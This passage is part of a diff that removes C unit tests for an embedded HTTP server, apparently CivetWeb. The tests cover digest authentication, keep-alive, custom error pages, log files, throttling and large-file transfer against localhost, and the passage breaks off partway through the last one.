-	ck_assert_int_gt(client_res, 0);
-	ck_assert_int_le(client_res, sizeof(client_err));
-	ck_assert_str_eq(client_err, test_content);
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-	/* Create a .htpasswd file */
-	client_res = mg_modify_passwords_file(passwd_file, domain, "user", "pass");
-	ck_assert_int_eq(client_res, 1);
-
-	client_res = mg_modify_passwords_file(NULL, domain, "user", "pass");
-	ck_assert_int_eq(client_res, 0); /* Filename is required */
-
-	test_sleep(1);
-
-	/* Repeat test after .htpasswd is created */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /%s HTTP/1.0\r\n\r\n", test_file);
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "401");
-
-	auth_request = NULL;
-	for (i = 0; i < client_ri->num_headers; i++) {
-		if (!mg_strcasecmp(client_ri->http_headers[i].name,
-		                   "WWW-Authenticate")) {
-			ck_assert_ptr_eq(auth_request, NULL);
-			auth_request = client_ri->http_headers[i].value;
-			ck_assert_ptr_ne(auth_request, NULL);
-		}
-	}
-	ck_assert_ptr_ne(auth_request, NULL);
-	str = "Digest qop=\"auth\", realm=\"";
-	len = strlen(str);
-	ck_assert(!mg_strncasecmp(auth_request, str, len));
-	ck_assert(!strncmp(auth_request + len, domain, strlen(domain)));
-	len += strlen(domain);
-	str = "\", nonce=\"";
-	ck_assert(!strncmp(auth_request + len, str, strlen(str)));
-	len += strlen(str);
-	str = strchr(auth_request + len, '\"');
-	ck_assert_ptr_ne(str, NULL);
-	ck_assert_ptr_ne(str, auth_request + len);
-	/* nonce is from including (auth_request + len) to excluding (str) */
-	ck_assert_int_gt((ptrdiff_t)(str) - (ptrdiff_t)(auth_request + len), 0);
-	ck_assert_int_lt((ptrdiff_t)(str) - (ptrdiff_t)(auth_request + len),
-	                 (ptrdiff_t)sizeof(nonce));
-	memset(nonce, 0, sizeof(nonce));
-	memcpy(nonce,
-	       auth_request + len,
-	       (size_t)((ptrdiff_t)(str) - (ptrdiff_t)(auth_request + len)));
-	memset(HA1, 0, sizeof(HA1));
-	memset(HA2, 0, sizeof(HA2));
-	memset(HA, 0, sizeof(HA));
-	memset(HA1_md5_buf, 0, sizeof(HA1_md5_buf));
-	memset(HA2_md5_buf, 0, sizeof(HA2_md5_buf));
-	memset(HA_md5_buf, 0, sizeof(HA_md5_buf));
-
-	sprintf(HA1, "%s:%s:%s", "user", domain, "pass");
-	sprintf(HA2, "%s:/%s", "GET", test_file);
-	HA1_md5_ret = mg_md5(HA1_md5_buf, HA1, NULL);
-	HA2_md5_ret = mg_md5(HA2_md5_buf, HA2, NULL);
-
-	ck_assert_ptr_eq(HA1_md5_ret, HA1_md5_buf);
-	ck_assert_ptr_eq(HA2_md5_ret, HA2_md5_buf);
-
-	HA_md5_ret = mg_md5(HA_md5_buf, "user", ":", domain, ":", "pass", NULL);
-	ck_assert_ptr_eq(HA_md5_ret, HA_md5_buf);
-	ck_assert_str_eq(HA1_md5_ret, HA_md5_buf);
-
-	HA_md5_ret = mg_md5(HA_md5_buf, "GET", ":", "/", test_file, NULL);
-	ck_assert_ptr_eq(HA_md5_ret, HA_md5_buf);
-	ck_assert_str_eq(HA2_md5_ret, HA_md5_buf);
-
-	HA_md5_ret = mg_md5(HA_md5_buf,
-	                    HA1_md5_buf,
-	                    ":",
-	                    nonce,
-	                    ":",
-	                    nc,
-	                    ":",
-	                    cnonce,
-	                    ":",
-	                    "auth",
-	                    ":",
-	                    HA2_md5_buf,
-	                    NULL);
-	ck_assert_ptr_eq(HA_md5_ret, HA_md5_buf);
-
-	mg_close_connection(client_conn);
-
-	/* Retry with authorization */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /%s HTTP/1.0\r\n", test_file);
-	mg_printf(client_conn,
-	          "Authorization: Digest "
-	          "username=\"%s\", "
-	          "realm=\"%s\", "
-	          "nonce=\"%s\", "
-	          "uri=\"/%s\", "
-	          "qop=auth, "
-	          "nc=%s, "
-	          "cnonce=\"%s\", "
-	          "response=\"%s\"\r\n\r\n",
-	          "user",
-	          domain,
-	          nonce,
-	          test_file,
-	          nc,
-	          cnonce,
-	          HA_md5_buf);
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "200");
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	ck_assert_int_gt(client_res, 0);
-	ck_assert_int_le(client_res, sizeof(client_err));
-	ck_assert_str_eq(client_err, test_content);
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-	/* Retry DELETE with authorization of a user not authorized for DELETE */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "DELETE /%s HTTP/1.0\r\n", test_file);
-	mg_printf(client_conn,
-	          "Authorization: Digest "
-	          "username=\"%s\", "
-	          "realm=\"%s\", "
-	          "nonce=\"%s\", "
-	          "uri=\"/%s\", "
-	          "qop=auth, "
-	          "nc=%s, "
-	          "cnonce=\"%s\", "
-	          "response=\"%s\"\r\n\r\n",
-	          "user",
-	          domain,
-	          nonce,
-	          test_file,
-	          nc,
-	          cnonce,
-	          HA_md5_buf);
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "401");
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-	/* Remove the user from the .htpasswd file again */
-	client_res = mg_modify_passwords_file(passwd_file, domain, "user", NULL);
-	ck_assert_int_eq(client_res, 1);
-
-	test_sleep(1);
-
-
-	/* Try to access the file again. Expected: 401 error */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /%s HTTP/1.0\r\n\r\n", test_file);
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "401");
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-
-	/* Now remove the password file */
-	(void)remove(passwd_file);
-	test_sleep(1);
-
-
-	/* Access to the file must work like before */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /%s HTTP/1.0\r\n\r\n", test_file);
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "200");
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	ck_assert_int_gt(client_res, 0);
-	ck_assert_int_le(client_res, sizeof(client_err));
-	ck_assert_str_eq(client_err, test_content);
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-
-	/* Stop the server and clean up */
-	test_mg_stop(ctx);
-	(void)remove(test_file);
-	(void)remove(passwd_file);
-	(void)remove("put_delete_auth_file.csv");
-
-#endif
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_keep_alive)
-{
-	struct mg_context *ctx;
-	const char *OPTIONS[] =
-	{ "listening_ports",
-	  "8081",
-	  "request_timeout_ms",
-	  "10000",
-	  "enable_keep_alive",
-	  "yes",
-#if !defined(NO_FILES)
-	  "document_root",
-	  ".",
-	  "enable_directory_listing",
-	  "no",
-#endif
-	  NULL };
-
-	struct mg_connection *client_conn;
-	char client_err[256];
-	const struct mg_request_info *client_ri;
-	int client_res, i;
-	const char *connection_header;
-
-	mark_point();
-
-	ctx = test_mg_start(NULL, NULL, OPTIONS);
-
-	ck_assert(ctx != NULL);
-
-	/* HTTP 1.1 GET request */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8081, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn,
-	          "GET / HTTP/1.1\r\nHost: "
-	          "localhost:8081\r\nConnection: keep-alive\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(client_ri->local_uri, "404");
-#else
-	ck_assert_str_eq(client_ri->local_uri, "403");
-#endif
-
-	connection_header = 0;
-	for (i = 0; i < client_ri->num_headers; i++) {
-		if (!mg_strcasecmp(client_ri->http_headers[i].name, "Connection")) {
-			ck_assert_ptr_eq(connection_header, NULL);
-			connection_header = client_ri->http_headers[i].value;
-			ck_assert_ptr_ne(connection_header, NULL);
-		}
-	}
-	/* Error replies will close the connection, even if keep-alive is set. */
-	ck_assert_ptr_ne(connection_header, NULL);
-	ck_assert_str_eq(connection_header, "close");
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-	/* TODO: request a file and keep alive
-	 * (will only work if NO_FILES is not set). */
-
-	/* Stop the server and clean up */
-	test_mg_stop(ctx);
-
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_error_handling)
-{
-	struct mg_context *ctx;
-	FILE *f;
-
-	char bad_thread_num[32] = "badnumber";
-
-	struct mg_callbacks callbacks;
-	char errmsg[256];
-
-	struct mg_connection *client_conn;
-	char client_err[256];
-	const struct mg_request_info *client_ri;
-	int client_res, i;
-
-	const char *OPTIONS[32];
-	int opt_cnt = 0;
-
-	mark_point();
-
-#if !defined(NO_FILES)
-	OPTIONS[opt_cnt++] = "document_root";
-	OPTIONS[opt_cnt++] = ".";
-#endif
-	OPTIONS[opt_cnt++] = "error_pages";
-	OPTIONS[opt_cnt++] = "./";
-	OPTIONS[opt_cnt++] = "listening_ports";
-	OPTIONS[opt_cnt++] = "8080";
-	OPTIONS[opt_cnt++] = "num_threads";
-	OPTIONS[opt_cnt++] = bad_thread_num;
-	OPTIONS[opt_cnt++] = "unknown_option";
-	OPTIONS[opt_cnt++] = "unknown_option_value";
-	OPTIONS[opt_cnt] = NULL;
-
-	memset(&callbacks, 0, sizeof(callbacks));
-
-	callbacks.log_message = log_msg_func;
-
-	/* test with unknown option */
-	memset(errmsg, 0, sizeof(errmsg));
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-
-	/* Details of errmsg may vary, but it may not be empty */
-	ck_assert_str_ne(errmsg, "");
-	ck_assert(ctx == NULL);
-	ck_assert_str_eq(errmsg, "Invalid option: unknown_option");
-
-	/* Remove invalid option */
-	for (i = 0; OPTIONS[i]; i++) {
-		if (strstr(OPTIONS[i], "unknown_option")) {
-			OPTIONS[i] = 0;
-		}
-	}
-
-	/* Test with bad num_thread option */
-	memset(errmsg, 0, sizeof(errmsg));
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-
-	/* Details of errmsg may vary, but it may not be empty */
-	ck_assert_str_ne(errmsg, "");
-	ck_assert(ctx == NULL);
-	ck_assert_str_eq(errmsg, "Invalid number of worker threads");
-
-/* Set to a number - but use a number above the limit */
-#ifdef MAX_WORKER_THREADS
-	sprintf(bad_thread_num, "%u", MAX_WORKER_THREADS + 1);
-#else
-	sprintf(bad_thread_num, "%lu", 1000000000lu);
-#endif
-
-	/* Test with bad num_thread option */
-	memset(errmsg, 0, sizeof(errmsg));
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-
-	/* Details of errmsg may vary, but it may not be empty */
-	ck_assert_str_ne(errmsg, "");
-	ck_assert(ctx == NULL);
-	ck_assert_str_eq(errmsg, "Too many worker threads");
-
-
-	/* HTTP 1.0 GET request - server is not running */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-	ck_assert(client_conn == NULL);
-
-	/* Error message detail may vary - it may not be empty ans should contain
-	 * some information "connect" failed */
-	ck_assert_str_ne(client_err, "");
-	ck_assert(strstr(client_err, "connect"));
-
-
-	/* This time start the server with a valid configuration */
-	sprintf(bad_thread_num, "%i", 1);
-	memset(errmsg, 0, sizeof(errmsg));
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-
-	ck_assert_str_eq(errmsg, "");
-	ck_assert(ctx != NULL);
-
-
-	/* Server is running now */
-	test_sleep(1);
-
-	/* Remove error files (in case they exist) */
-	(void)remove("error.htm");
-	(void)remove("error4xx.htm");
-	(void)remove("error404.htm");
-
-
-	/* Ask for something not existing - should get default 404 */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /something/not/existing HTTP/1.0\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "404");
-	mg_close_connection(client_conn);
-	test_sleep(1);
-
-	/* Create an error.htm file */
-	f = fopen("error.htm", "wt");
-	ck_assert(f != NULL);
-	(void)fprintf(f, "err-all");
-	(void)fclose(f);
-
-
-	/* Ask for something not existing - should get error.htm */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /something/not/existing HTTP/1.0\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "200");
-
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	mg_close_connection(client_conn);
-	ck_assert_int_eq(client_res, 7);
-	client_err[8] = 0;
-	ck_assert_str_eq(client_err, "err-all");
-	test_sleep(1);
-
-	/* Create an error4xx.htm file */
-	f = fopen("error4xx.htm", "wt");
-	ck_assert(f != NULL);
-	(void)fprintf(f, "err-4xx");
-	(void)fclose(f);
-
-
-	/* Ask for something not existing - should get error4xx.htm */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /something/not/existing HTTP/1.0\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "200");
-
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	mg_close_connection(client_conn);
-	ck_assert_int_eq(client_res, 7);
-	client_err[8] = 0;
-	ck_assert_str_eq(client_err, "err-4xx");
-	test_sleep(1);
-
-	/* Create an error404.htm file */
-	f = fopen("error404.htm", "wt");
-	ck_assert(f != NULL);
-	(void)fprintf(f, "err-404");
-	(void)fclose(f);
-
-
-	/* Ask for something not existing - should get error404.htm */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /something/not/existing HTTP/1.0\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "200");
-
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	mg_close_connection(client_conn);
-	ck_assert_int_eq(client_res, 7);
-	client_err[8] = 0;
-	ck_assert_str_eq(client_err, "err-404");
-	test_sleep(1);
-
-
-	/* Ask in a malformed way - should get error4xx.htm */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "Gimme some file!\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "200");
-
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	mg_close_connection(client_conn);
-	ck_assert_int_eq(client_res, 7);
-	client_err[8] = 0;
-	ck_assert_str_eq(client_err, "err-4xx");
-	test_sleep(1);
-
-
-	/* Remove all error files created by this test */
-	(void)remove("error.htm");
-	(void)remove("error4xx.htm");
-	(void)remove("error404.htm");
-
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-
-	/* HTTP 1.1 GET request - must not work, since server is already stopped  */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert(client_conn == NULL);
-	ck_assert_str_ne(client_err, "");
-
-	test_sleep(1);
-
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_error_log_file)
-{
-	/* Server var */
-	struct mg_context *ctx;
-	const char *OPTIONS[32];
-	int opt_cnt = 0;
-
-	/* Client var */
-	struct mg_connection *client;
-	char client_err_buf[256];
-	char client_data_buf[256];
-	const struct mg_request_info *client_ri;
-
-	/* File content check var */
-	FILE *f;
-	char buf[1024];
-	int len, ok;
-
-	mark_point();
-
-	/* Set options and start server */
-	OPTIONS[opt_cnt++] = "listening_ports";
-	OPTIONS[opt_cnt++] = "8080";
-	OPTIONS[opt_cnt++] = "error_log_file";
-	OPTIONS[opt_cnt++] = "error.log";
-	OPTIONS[opt_cnt++] = "access_log_file";
-	OPTIONS[opt_cnt++] = "access.log";
-#if !defined(NO_FILES)
-	OPTIONS[opt_cnt++] = "document_root";
-	OPTIONS[opt_cnt++] = ".";
-#endif
-	OPTIONS[opt_cnt] = NULL;
-
-	ctx = test_mg_start(NULL, 0, OPTIONS);
-	ck_assert(ctx != NULL);
-
-	/* Remove log files (they may exist from previous incomplete runs of
-	 * this test) */
-	(void)remove("error.log");
-	(void)remove("access.log");
-
-	/* connect client */
-	memset(client_err_buf, 0, sizeof(client_err_buf));
-	memset(client_data_buf, 0, sizeof(client_data_buf));
-
-	client = mg_download("127.0.0.1",
-	                     8080,
-	                     0,
-	                     client_err_buf,
-	                     sizeof(client_err_buf),
-	                     "GET /not_existing_file.ext HTTP/1.0\r\n\r\n");
-
-	ck_assert(ctx != NULL);
-	ck_assert_str_eq(client_err_buf, "");
-
-	client_ri = mg_get_request_info(client);
-
-	ck_assert(client_ri != NULL);
-	ck_assert_str_eq(client_ri->local_uri, "404");
-
-	/* Close the client connection */
-	mg_close_connection(client);
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-
-	/* Check access.log */
-	memset(buf, 0, sizeof(buf));
-	f = fopen("access.log", "r");
-	ck_assert_msg(f != NULL, "Cannot open access log file");
-	ok = (NULL != fgets(buf, sizeof(buf) - 1, f));
-	(void)fclose(f);
-	ck_assert_msg(ok, "Cannot read access log file");
-	len = (int)strlen(buf);
-	ck_assert_int_gt(len, 0);
-	ok = (NULL != strstr(buf, "not_existing_file.ext"));
-	ck_assert_msg(ok, "Did not find uri in access log file");
-	ok = (NULL != strstr(buf, "404"));
-	ck_assert_msg(ok, "Did not find HTTP status code in access log file");
-
-	/* Check error.log */
-	memset(buf, 0, sizeof(buf));
-	f = fopen("error.log", "r");
-	if (f) {
-		(void)fgets(buf, sizeof(buf) - 1, f);
-		fclose(f);
-	}
-	ck_assert_msg(f == NULL,
-	              "Should not create error log file on 404, but got [%s]",
-	              buf);
-
-	/* Remove log files */
-	(void)remove("error.log");
-	(void)remove("access.log");
-
-	/* Start server with bad options */
-	ck_assert_str_eq(OPTIONS[0], "listening_ports");
-	OPTIONS[1] = "bad port syntax";
-
-	ctx = test_mg_start(NULL, 0, OPTIONS);
-	ck_assert_msg(
-	    ctx == NULL,
-	    "Should not be able to start server with bad port configuration");
-
-	/* Check access.log */
-	memset(buf, 0, sizeof(buf));
-	f = fopen("access.log", "r");
-	if (f) {
-		(void)fgets(buf, sizeof(buf) - 1, f);
-		fclose(f);
-	}
-	ck_assert_msg(
-	    f == NULL,
-	    "Should not create access log file if start fails, but got [%s]",
-	    buf);
-
-	/* Check error.log */
-	memset(buf, 0, sizeof(buf));
-	f = fopen("error.log", "r");
-	ck_assert_msg(f != NULL, "Cannot open access log file");
-	ok = (NULL != fgets(buf, sizeof(buf) - 1, f));
-	(void)fclose(f);
-	ck_assert_msg(ok, "Cannot read access log file");
-	len = (int)strlen(buf);
-	ck_assert_int_gt(len, 0);
-	ok = (NULL != strstr(buf, "port"));
-	ck_assert_msg(ok, "Did not find port as error reason in error log file");
-
-
-	/* Remove log files */
-	(void)remove("error.log");
-	(void)remove("access.log");
-
-	mark_point();
-}
-END_TEST
-
-
-static int
-test_throttle_begin_request(struct mg_connection *conn)
-{
-	const struct mg_request_info *ri;
-	long unsigned len = 1024 * 10;
-	const char *block = "0123456789";
-	unsigned long i, blocklen;
-
-	ck_assert(conn != NULL);
-	ri = mg_get_request_info(conn);
-	ck_assert(ri != NULL);
-
-	ck_assert_str_eq(ri->request_method, "GET");
-	ck_assert_str_eq(ri->request_uri, "/throttle");
-	ck_assert_str_eq(ri->local_uri, "/throttle");
-	ck_assert_str_eq(ri->http_version, "1.0");
-	ck_assert_str_eq(ri->query_string, "q");
-	ck_assert_str_eq(ri->remote_addr, "127.0.0.1");
-
-	mg_printf(conn,
-	          "HTTP/1.1 200 OK\r\n"
-	          "Content-Length: %lu\r\n"
-	          "Connection: close\r\n\r\n",
-	          len);
-
-	blocklen = (unsigned long)strlen(block);
-
-	for (i = 0; i < len; i += blocklen) {
-		mg_write(conn, block, blocklen);
-	}
-
-	mark_point();
-
-	return 987; /* Not a valid HTTP response code,
-	             * but it should be written to the log and passed to
-	             * end_request. */
-}
-
-
-static void
-test_throttle_end_request(const struct mg_connection *conn,
-                          int reply_status_code)
-{
-	const struct mg_request_info *ri;
-
-	ck_assert(conn != NULL);
-	ri = mg_get_request_info(conn);
-	ck_assert(ri != NULL);
-
-	ck_assert_str_eq(ri->request_method, "GET");
-	ck_assert_str_eq(ri->request_uri, "/throttle");
-	ck_assert_str_eq(ri->local_uri, "/throttle");
-	ck_assert_str_eq(ri->http_version, "1.0");
-	ck_assert_str_eq(ri->query_string, "q");
-	ck_assert_str_eq(ri->remote_addr, "127.0.0.1");
-
-	ck_assert_int_eq(reply_status_code, 987);
-}
-
-
-START_TEST(test_throttle)
-{
-	/* Server var */
-	struct mg_context *ctx;
-	struct mg_callbacks callbacks;
-	const char *OPTIONS[32];
-	int opt_cnt = 0;
-
-	/* Client var */
-	struct mg_connection *client;
-	char client_err_buf[256];
-	char client_data_buf[256];
-	const struct mg_request_info *client_ri;
-
-	/* timing test */
-	int r, data_read;
-	time_t t0, t1;
-	double dt;
-
-	mark_point();
-
-
-/* Set options and start server */
-#if !defined(NO_FILES)
-	OPTIONS[opt_cnt++] = "document_root";
-	OPTIONS[opt_cnt++] = ".";
-#endif
-	OPTIONS[opt_cnt++] = "listening_ports";
-	OPTIONS[opt_cnt++] = "8080";
-	OPTIONS[opt_cnt++] = "throttle";
-	OPTIONS[opt_cnt++] = "*=1k";
-	OPTIONS[opt_cnt] = NULL;
-
-	memset(&callbacks, 0, sizeof(callbacks));
-	callbacks.begin_request = test_throttle_begin_request;
-	callbacks.end_request = test_throttle_end_request;
-
-	ctx = test_mg_start(&callbacks, 0, OPTIONS);
-	ck_assert(ctx != NULL);
-
-	/* connect client */
-	memset(client_err_buf, 0, sizeof(client_err_buf));
-	memset(client_data_buf, 0, sizeof(client_data_buf));
-
-	strcpy(client_err_buf, "reset-content");
-	client = mg_download("127.0.0.1",
-	                     8080,
-	                     0,
-	                     client_err_buf,
-	                     sizeof(client_err_buf),
-	                     "GET /throttle?q HTTP/1.0\r\n\r\n");
-
-	ck_assert(ctx != NULL);
-	ck_assert_str_eq(client_err_buf, "");
-
-	client_ri = mg_get_request_info(client);
-
-	ck_assert(client_ri != NULL);
-	ck_assert_str_eq(client_ri->local_uri, "200");
-
-	ck_assert_int_eq(client_ri->content_length, 1024 * 10);
-
-	data_read = 0;
-	t0 = time(NULL);
-	while (data_read < client_ri->content_length) {
-		r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-		ck_assert_int_ge(r, 0);
-		data_read += r;
-	}
-	t1 = time(NULL);
-	dt = difftime(t1, t0) * 1000.0; /* Elapsed time in ms - in most systems
-	                                 * only with second resolution */
-
-	/* Time estimation: Data size is 10 kB, with 1 kB/s speed limit.
-	 * The first block (1st kB) is transferred immediately, the second
-	 * block (2nd kB) one second later, the third block (3rd kB) two
-	 * seconds later, .. the last block (10th kB) nine seconds later.
-	 * The resolution of time measurement using the "time" C library
-	 * function is 1 second, so we should add +/- one second tolerance.
-	 * Thus, download of 10 kB with 1 kB/s should not be faster than
-	 * 8 seconds. */
-
-	/* Check if there are at least 8 seconds */
-	ck_assert_int_ge((int)dt, 8 * 1000);
-
-	/* Nothing left to read */
-	r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-	ck_assert_int_eq(r, 0);
-
-	/* Close the client connection */
-	mg_close_connection(client);
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_init_library)
-{
-	unsigned f_avail, f_ret;
-
-	mark_point();
-
-	f_avail = mg_check_feature(0xFF);
-	f_ret = mg_init_library(f_avail);
-	ck_assert_uint_eq(f_ret, f_avail);
-}
-END_TEST
-
-
-#define LARGE_FILE_SIZE (1024 * 1024 * 10)
-
-static int
-test_large_file_begin_request(struct mg_connection *conn)
-{
-	const struct mg_request_info *ri;
-	long unsigned len = LARGE_FILE_SIZE;
-	const char *block = "0123456789";
-	uint64_t i;
-	size_t blocklen;
-
-	ck_assert(conn != NULL);
-	ri = mg_get_request_info(conn);
-	ck_assert(ri != NULL);
-
-	ck_assert_str_eq(ri->request_method, "GET");
-	ck_assert_str_eq(ri->http_version, "1.1");
-	ck_assert_str_eq(ri->remote_addr, "127.0.0.1");
-	ck_assert_ptr_eq(ri->query_string, NULL);
-	ck_assert_ptr_ne(ri->local_uri, NULL);
-
-	mg_printf(conn,
-	          "HTTP/1.1 200 OK\r\n"
-	          "Content-Length: %lu\r\n"
-	          "Connection: close\r\n\r\n",
-	          len);
-
-	blocklen = strlen(block);
-
-	for (i = 0; i < len; i += blocklen) {
-		mg_write(conn, block, blocklen);
-	}
-
-	mark_point();
-
-	return 200;
-}
-
-
-START_TEST(test_large_file)
-{
-	/* Server var */
-	struct mg_context *ctx;
-	struct mg_callbacks callbacks;
-	const char *OPTIONS[32];
-	int opt_cnt = 0;
-#if !defined(NO_SSL)
-	const char *ssl_cert = locate_ssl_cert();
-#endif
-	char errmsg[256] = {0};
-
-	/* Client var */
-	struct mg_connection *client;
-	char client_err_buf[256];
-	char client_data_buf[256];
-	const struct mg_request_info *client_ri;
-	int64_t data_read;
-	int r;
-	int retry, retry_ok_cnt, retry_fail_cnt;
-
-	mark_point();
-
-/* Set options and start server */
-#if !defined(NO_FILES)
-	OPTIONS[opt_cnt++] = "document_root";
-	OPTIONS[opt_cnt++] = ".";
-#endif
-#if defined(NO_SSL)
-	OPTIONS[opt_cnt++] = "listening_ports";
-	OPTIONS[opt_cnt++] = "8080";
-#else
